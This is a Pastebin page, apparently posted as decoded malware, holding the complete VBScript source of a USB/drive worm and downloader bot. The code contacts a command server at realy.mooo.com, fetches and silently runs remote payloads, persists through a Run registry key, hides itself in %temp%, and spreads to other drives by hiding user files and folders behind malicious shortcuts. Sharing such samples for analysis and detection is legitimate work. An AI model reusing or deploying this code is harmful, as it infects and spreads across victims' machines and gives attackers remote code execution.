API tools faq
paste
James_inthe_box

Decoded

James_inthe_box
Nov 8th, 2018
541
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.20 KB | None | 0 0
raw download clone embed print report
  1. '<coded by Bl4cKs0cK>'
  2. On Error Resume Next
  3. Dim host
  4. host = "realy.mooo.com"
  5. Dim host_script
  6. host_script = "bot/lancer/index.php"
  7. Dim activ_name
  8. activ_name = "SysinfY2X.db"
  9. Dim passiv_name
  10. passiv_name = "Manuel.doc"
  11. Dim sleep_time
  12. sleep_time = 2000
  13. Dim sleep_time_limit
  14. sleep_time_limit = 60000
  15. Dim http
  16. Set http = CreateObject("MSXML2.ServerXMLHTTP")
  17. Dim sh
  18. Set sh = WScript.CreateObject("WScript.Shell")
  19. Dim fs
  20. Set fs= CreateObject("Scripting.FileSystemObject")
  21. Dim WMIService
  22. Set WMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  23. Const adTypeBinary = 1
  24. Const adTypeText = 2
  25. Const adSaveCreateOverWrite = 2
  26. Const adSaveCreateNotExist = 1
  27. Dim stream_self
  28. Set stream_self = CreateObject("Adodb.Stream")
  29. Dim script_name
  30. script_name = Wscript.ScriptName
  31. Dim tmp_dir
  32. tmp_dir = sh.ExpandEnvironmentStrings("%temp%") & "\"
  33. host = "http://" & host & "/"
  34. stream_self.Type = adTypeBinary
  35. stream_self.Open
  36. stream_self.LoadFromFile fs.GetFile(Wscript.ScriptFullName)
  37. Dim script_size
  38. script_size = stream_self.Size
  39. If (script_name = activ_name) Then
  40. Dim serv_rep, cont, cont_limit
  41. cont = 0
  42. cont_limit = CInt(sleep_time_limit / sleep_time)
  43. While True
  44. infect_drives
  45. infect_registre
  46. protect_del
  47. kill_old("SysinfYhX.db")
  48. If cont < cont_limit Then
  49. cont = cont + 1
  50. wscript.sleep sleep_time
  51. Else
  52. cont = 0
  53. serv_rep = serv_cmd("ping")
  54. If serv_rep <> "-1" Then
  55. cont_limit = CInt(CInt(serv_rep) / sleep_time)
  56. serv_rep = serv_cmd(script_size & activ_name)
  57. If serv_rep <> "-1" Then
  58. If serv_rep <> "0" Then
  59. get_new_v(serv_rep)
  60. Else
  61. serv_rep = serv_cmd("list")
  62. If serv_rep <> "-1" Then
  63. get_list(serv_rep)
  64. End If
  65. End If
  66. End If
  67. Else
  68. cont_limit = CInt(sleep_time_limit / sleep_time)
  69. End If
  70. End If
  71. Wend
  72. Else
  73. infect_machin
  74. End if
  75. Function serv_cmd(cmd)
  76. On Error Resume Next
  77. Dim stat
  78. http.Open "GET", host & host_script & "?cmd=" & cmd , False
  79. http.Send
  80. stat = http.Status
  81. If stat <> 200 Then
  82. serv_cmd = "-1"
  83. Else
  84. serv_cmd=http.ResponseText
  85. End If
  86. End Function
  87. Function bot_up(arr)
  88. On Error Resume Next
  89. Dim stat, frm_, size_, to_, lnc_
  90. frm_ = arr(1)
  91. size_ = arr(2)
  92. to_ = arr(3)
  93. lnc_ = arr(4)
  94. Dim stream
  95. Set stream = CreateObject("Adodb.Stream")
  96. stream.Type = adTypeBinary
  97. stream.Open
  98. If fs.FileExists (tmp_dir & to_) Then
  99. If fs.GetFile(tmp_dir & to_).Size <> size_ Then
  100. http.Open "GET", frm_, False
  101. http.Send
  102. If http.Status <> 200 Then
  103. bot_up = False
  104. Else
  105. stream.Write http.ResponseBody
  106. fs.GetFile(tmp_dir & to_).Attributes=2
  107. fs.DeleteFile tmp_dir & to_, True
  108. stream.SaveToFile tmp_dir & to_, adSaveCreateOverWrite
  109. fs.GetFile(tmp_dir & to_).Attributes=1+2+4
  110. bot_up = True
  111. End If
  112. Else
  113. bot_up = False
  114. End If
  115. Else
  116. http.Open "GET", frm_, False
  117. http.Send
  118. If http.Status <> 200 Then
  119. bot_up = False
  120. Else
  121. stream.Write http.ResponseBody
  122. stream.SaveToFile tmp_dir & to_, adSaveCreateOverWrite
  123. fs.GetFile(tmp_dir & to_).Attributes=1+2+4
  124. bot_up = True
  125. End If
  126. End If
  127. stream.Close
  128. If bot_up Then
  129. sh.Run "cmd /c start " & lnc_ & " %temp%\" & to_, 0
  130. End If
  131. End Function
  132. Function get_split(in_)
  133. On Error Resume Next
  134. Dim ret
  135. ret = Array(True, "", 0, "", "")
  136. ret(1) = Split(Split(in_, "<from>")(1), "<br>")(0)
  137. ret(2) = CInt(Split(Split(in_, "<size>")(1), "<br>")(0))
  138. ret(3) = Split(Split(in_, "<to>")(1), "<br>")(0)
  139. ret(4) = Split(Split(in_, "<lancer>")(1), "<br>")(0)
  140. For Each a In ret
  141. If a = "" Or a = " " Then
  142. ret(0) = False
  143. Exit For
  144. End If
  145. Next
  146. get_split = ret
  147. End Function
  148. Function get_new_v(req)
  149. On Error Resume Next
  150. Dim data_
  151. data_ = get_split(req)
  152. If data_(0) Then
  153. If bot_up(data_) Then
  154. If data_(3) <> script_name Then
  155. del_registre
  156. fs.GetFile(Wscript.ScriptFullName).Attributes=2
  157. fs.DeleteFile Wscript.ScriptFullName, True
  158. End If
  159. wscript.quit
  160. End If
  161. End If
  162. End Function
  163. Function get_list(req)
  164. On Error Resume Next
  165. If req <> "0" Then
  166. Dim tbl
  167. tbl = Split(req, "<list>")
  168. For Each case_ In tbl
  169. Dim data_
  170. data_ = get_split(case_)
  171. If data_(0) Then
  172. bot_up(data_)
  173. End If
  174. Next
  175. get_list = True
  176. Else
  177. get_list = False
  178. End If
  179. End Function
  180. Function infect_machin
  181. On Error Resume Next
  182. infect_registre
  183. If fs.FileExists (tmp_dir & activ_name) Then
  184. If fs.GetFile(tmp_dir & activ_name).Size <> script_size Then
  185. fs.GetFile(tmp_dir & activ_name).Attributes=2
  186. fs.DeleteFile tmp_dir & activ_name, True
  187. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateOverWrite
  188. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4
  189. infect_machin = True
  190. Else
  191. infect_machin = False
  192. End If
  193. Else
  194. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateNotExist
  195. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4
  196. infect_machin = True
  197. End If
  198. If infect_machin Then
  199. sh.Run "cmd /c start wscript /e:VBScript.Encode " & Replace(tmp_dir & activ_name," ", ChrW(34) & " " & ChrW(34)), 0
  200. Else
  201. Dim colItms
  202. Set colItms = WMIService.ExecQuery ("Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%" & activ_name & "%'")
  203. If colItms.Count = 0 Then
  204. sh.Run "cmd /c start wscript /e:VBScript.Encode " & Replace(tmp_dir & activ_name," ", ChrW(34) & " " & ChrW(34)), 0
  205. End If
  206. Set colItms = Nothing
  207. End If
  208. wscript.quit
  209. End Function
  210. Sub infect_drives
  211. On Error Resume Next
  212. Dim sys_drive
  213. sys_drive = sh.ExpandEnvironmentStrings("%SYSTEMDRIVE%")
  214. For Each cle In fs.Drives
  215. If cle.isReady And (cle.DriveType = 1 Or cle.DriveType = 3 Or cle.DriveType = 4) Then
  216. Dim d
  217. d = cle.path
  218. If d <> sys_drive Then
  219. If fs.FileExists(d & "\" & passiv_name) Then
  220. If (fs.GetFile(d & "\" & passiv_name).Size <> script_size) And (cle.FreeSpace > Abs(fs.GetFile(d & "\" & passiv_name).Size - script_size)) Then
  221. fs.GetFile(d & "\" & passiv_name).Attributes=2
  222. fs.DeleteFile d & "\" & passiv_name, True
  223. stream_self.SaveToFile d & "\" & passiv_name, adSaveCreateOverWrite
  224. End If
  225. Else
  226. If cle.FreeSpace > script_size Then
  227. stream_self.SaveToFile d & "\" & passiv_name, adSaveCreateNotExist
  228. End If
  229. End If
  230. fs.GetFile(d & "\" & passiv_name).Attributes=1+2+4
  231. If cle.FreeSpace > 0 Then
  232. For Each f In fs.GetFolder(d & "\").Files
  233. Dim f_ext
  234. If instr(f.name, ".") Then
  235. Dim f_name
  236. f_name = split(f.name, ".")
  237. f_ext = lcase( f_name(ubound(f_name)) )
  238. Else
  239. f_ext = "NULL"
  240. End if
  241. If f_ext <> "lnk" And f.name <> passiv_name And f.Attributes <> 2+4 Then
  242. f.Attributes = 2+4
  243. If fs.FileExists(d & "\" & f.name & ".lnk") Then
  244. fs.GetFile(d & "\" & f.name & ".lnk").Attributes = 0
  245. End If
  246. Dim shurt, s_icon
  247. Set shurt = sh.CreateShortcut(d & "\" & f.name & ".lnk")
  248. shurt.WindowStyle = 7
  249. shurt.TargetPath = "cmd.exe"
  250. shurt.WorkingDirectory = ""
  251. Dim f_arg
  252. f_arg = "/c start wscript /e:VBScript.Encode " & Replace(passiv_name," ", ChrW(34) & " " & ChrW(34)) & " & start " & replace( f.name," ", ChrW(34) & " " & ChrW(34))
  253. shurt.Arguments = f_arg & " & exit"
  254. s_icon = sh.regread("HKLM\SOFTWARE\Classes\" & sh.regread("HKLM\SOFTWARE\Classes\." & f_ext & "\") & "\DefaultIcon\")
  255. If ( instr(s_icon, ",") = 0 ) Or f_ext = "NULL" Then
  256. shurt.IconLocation = f.path
  257. Else
  258. shurt.IconLocation = s_icon
  259. End if
  260. shurt.Save()
  261. fs.GetFile(d & "\" & f.name & ".lnk").Attributes = 1
  262. End if
  263. Next
  264. For Each ff In fs.GetFolder(d & "\").SubFolders
  265. If ff.Attributes <> 2+4 Then
  266. ff.Attributes = 2+4
  267. If fs.FileExists(d & "\" & ff.name & ".lnk") Then
  268. fs.GetFile(d & "\" & ff.name & ".lnk").Attributes = 0
  269. End If
  270. Dim shurt_, s_icon_
  271. Set shurt_ = sh.CreateShortcut(d & "\" & ff.name & ".lnk")
  272. shurt_.WindowStyle = 7
  273. shurt_.TargetPath = "cmd.exe"
  274. shurt_.WorkingDirectory = ""
  275. Dim ff_arg
  276. ff_arg = "/c start wscript /e:VBScript.Encode " & Replace(passiv_name," ", ChrW(34) & " " & ChrW(34)) & " & start explorer " & replace( ff.name," ", ChrW(34) & " " & ChrW(34))
  277. shurt_.Arguments = ff_arg & " & exit"
  278. s_icon_ = sh.regread("HKLM\SOFTWARE\Classes\Folder\DefaultIcon\")
  279. If instr(s_icon_, ",") = 0 Then
  280. shurt_.IconLocation = ff.path
  281. Else
  282. shurt_.IconLocation = s_icon_
  283. End if
  284. shurt_.save()
  285. fs.GetFile(d & "\" & ff.name & ".lnk").Attributes = 1
  286. End If
  287. Next
  288. End If
  289. End If
  290. End If
  291. Next
  292. End Sub
  293. Sub infect_registre
  294. On Error Resume Next
  295. Dim target, reg_d
  296. target = "C:\WINDOWS\system32\cmd.exe /c start wscript /e:VBScript.Encode %temp%\" & activ_name
  297. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(activ_name, ".")(0)
  298. sh.regwrite "HKCU" & reg_d, target, "REG_SZ"
  299. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"
  300. sh.regwrite "HKCU" & reg_d, 2, "REG_DWORD"
  301. End Sub
  302. Sub del_registre
  303. On Error Resume Next
  304. Dim reg_d
  305. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(activ_name, ".")(0)
  306. sh.RegDelete "HKCU" & reg_d
  307. End Sub
  308. Function protect_del
  309. On Error Resume Next
  310. If fs.FileExists (tmp_dir & activ_name) Then
  311. If fs.GetFile(tmp_dir & activ_name).Size <> script_size Then
  312. fs.GetFile(tmp_dir & activ_name).Attributes=2
  313. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateOverWrite
  314. End If
  315. Else
  316. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateNotExist
  317. End If
  318. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4
  319. End Function
  320. Function kill_old(old_name)
  321. On Error Resume Next
  322. Dim colItems, reg_d
  323. Set colItems = WMIService.ExecQuery ("Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%" & old_name & "%'")
  324. For Each objItem in colItems
  325. objItem.Terminate
  326. Next
  327. colItems = Nothing
  328. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(old_name, ".")(0)
  329. sh.RegDelete "HKCU" & reg_d
  330. fs.GetFile(tmp_dir & old_name).Attributes=2
  331. fs.DeleteFile tmp_dir & "\" & old_name, True
  332. End Function
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!